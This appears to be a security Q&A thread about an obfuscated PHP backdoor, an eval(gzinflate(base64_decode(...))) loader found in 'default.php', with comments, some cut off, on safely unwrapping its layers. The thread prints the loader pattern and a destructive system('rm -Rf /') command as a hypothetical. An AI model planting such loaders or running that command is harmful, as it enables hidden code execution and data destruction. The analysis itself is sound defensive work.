I found a file named "default.php" on the server with the following code:
eval(gzinflate(base64_decode(
"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")));
What can be the purpose of this script?
is an XSS vulnerability as well. (Not like it matters when you have remote code execution) – CodesInChaos Jan 28 '13 at 10:51

`eval` function executes PHP code passed to it as a string. So the code takes that big base64 string, turns it back into raw binary data using `base64_decode`, then runs that raw data through `gzinflate`, since the obfuscator originally ran the data through `gzdeflate`. So I just replaced the `eval` with an echo, so it prints out the de-obfuscated string. That operation returns another blob of PHP code that looks similar, with another `eval`, but actually contains a different base64 blob. If you repeat this over and over, eventually it results in the blob of code I posted. – Polynomial Jan 28 '13 at 11:23

`eval` with a `return`, then evals that. It then looks at the results and checks if there's another `eval` at the start. If there is, it loops back and does another replace/eval. If there's no `eval` at the start of the string, it prints the result, which gives us the final code. – Polynomial Jan 28 '13 at 11:24

`eval(gzinflate(base64_decode("...")));` `system("rm -Rf /")` in one of those many layers (which it could, if the code to be run contains an `exit` to prevent the `system` from ever being reached). – derobert Jan 29 '13 at 20:58

`system` command was disabled for security reasons, and the PHP process is sandboxed. – Polynomial Jan 29 '13 at 21:49

`base64_decode` & `gzinflate` yourself, skipping `eval` entirely. – derobert Jan 29 '13 at 22:07